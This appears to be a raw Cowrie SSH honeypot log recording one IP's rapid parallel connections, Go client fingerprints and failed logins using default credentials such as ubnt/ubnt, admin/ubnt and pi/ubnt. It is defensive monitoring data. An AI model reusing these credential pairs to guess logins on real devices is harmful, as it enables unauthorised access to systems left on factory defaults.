{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.382224Z","src_ip":"87.120.191.13","session":"3706b4f0989a"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38670,"dst_ip":"1.2.3.4","dst_port":22,"session":"17ca3bcb7485","protocol":"ssh","message":"New connection: 87.120.191.13:38670 (1.2.3.4:22) [session: 17ca3bcb7485]","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.420368Z"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.421376Z","src_ip":"87.120.191.13","session":"f19c498b1b95"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38686,"dst_ip":"1.2.3.4","dst_port":22,"session":"b504d7cfa67a","protocol":"ssh","message":"New connection: 87.120.191.13:38686 (1.2.3.4:22) [session: b504d7cfa67a]","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.422325Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38702,"dst_ip":"1.2.3.4","dst_port":22,"session":"925b49abf457","protocol":"ssh","message":"New connection: 87.120.191.13:38702 (1.2.3.4:22) [session: 925b49abf457]","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.432816Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38718,"dst_ip":"1.2.3.4","dst_port":22,"session":"023acf85b566","protocol":"ssh","message":"New connection: 87.120.191.13:38718 (1.2.3.4:22) [session: 023acf85b566]","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.441591Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38724,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f0941b065ef","protocol":"ssh","message":"New connection: 87.120.191.13:38724 (1.2.3.4:22) [session: 3f0941b065ef]","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.468602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.785593Z","src_ip":"87.120.191.13","session":"1aa9425db2f4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.787116Z","src_ip":"87.120.191.13","session":"1aa9425db2f4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.790092Z","src_ip":"87.120.191.13","session":"d62f8427108f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.792091Z","src_ip":"87.120.191.13","session":"d62f8427108f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.813409Z","src_ip":"87.120.191.13","session":"023acf85b566"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.814587Z","src_ip":"87.120.191.13","session":"b504d7cfa67a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.815294Z","src_ip":"87.120.191.13","session":"023acf85b566"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.816765Z","src_ip":"87.120.191.13","session":"b504d7cfa67a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.877902Z","src_ip":"87.120.191.13","session":"925b49abf457"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.879003Z","src_ip":"87.120.191.13","session":"925b49abf457"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.900767Z","src_ip":"87.120.191.13","session":"17ca3bcb7485"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.902198Z","src_ip":"87.120.191.13","session":"17ca3bcb7485"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.906606Z","src_ip":"87.120.191.13","session":"3f0941b065ef"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.907287Z","src_ip":"87.120.191.13","session":"3f0941b065ef"}
{"eventid":"cowrie.login.failed","username":"noc","password":"ubnt","message":"login attempt [noc/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:30.989537Z","src_ip":"87.120.191.13","session":"b504d7cfa67a"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:30.993794Z","src_ip":"87.120.191.13","session":"17ca3bcb7485"}
{"eventid":"cowrie.login.failed","username":"student","password":"ubnt","message":"login attempt [student/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:31.005569Z","src_ip":"87.120.191.13","session":"1aa9425db2f4"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ubnt","message":"login attempt [ftpuser/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:31.009658Z","src_ip":"87.120.191.13","session":"3f0941b065ef"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ubnt","message":"login attempt [ftpuser/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:31.038022Z","src_ip":"87.120.191.13","session":"d62f8427108f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ubnt","message":"login attempt [admin/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:31.078472Z","src_ip":"87.120.191.13","session":"925b49abf457"}
{"eventid":"cowrie.login.failed","username":"pi","password":"ubnt","message":"login attempt [pi/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:31.108973Z","src_ip":"87.120.191.13","session":"023acf85b566"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.011222Z","src_ip":"87.120.191.13","session":"b504d7cfa67a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.015189Z","src_ip":"87.120.191.13","session":"17ca3bcb7485"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.027236Z","src_ip":"87.120.191.13","session":"1aa9425db2f4"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38740,"dst_ip":"1.2.3.4","dst_port":22,"session":"db9a105177a0","protocol":"ssh","message":"New connection: 87.120.191.13:38740 (1.2.3.4:22) [session: db9a105177a0]","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.030054Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.030692Z","src_ip":"87.120.191.13","session":"db9a105177a0"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.031537Z","src_ip":"87.120.191.13","session":"3f0941b065ef"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38756,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fad171cdf5a","protocol":"ssh","message":"New connection: 87.120.191.13:38756 (1.2.3.4:22) [session: 4fad171cdf5a]","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.034394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.034872Z","src_ip":"87.120.191.13","session":"4fad171cdf5a"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38764,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbbaac36f911","protocol":"ssh","message":"New connection: 87.120.191.13:38764 (1.2.3.4:22) [session: fbbaac36f911]","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.046372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.047110Z","src_ip":"87.120.191.13","session":"fbbaac36f911"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38768,"dst_ip":"1.2.3.4","dst_port":22,"session":"06100a9e5666","protocol":"ssh","message":"New connection: 87.120.191.13:38768 (1.2.3.4:22) [session: 06100a9e5666]","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.050807Z"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.051448Z","src_ip":"87.120.191.13","session":"db9a105177a0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.053523Z","src_ip":"87.120.191.13","session":"06100a9e5666"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.054502Z","src_ip":"87.120.191.13","session":"4fad171cdf5a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.060032Z","src_ip":"87.120.191.13","session":"d62f8427108f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.067179Z","src_ip":"87.120.191.13","session":"fbbaac36f911"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.074042Z","src_ip":"87.120.191.13","session":"06100a9e5666"}
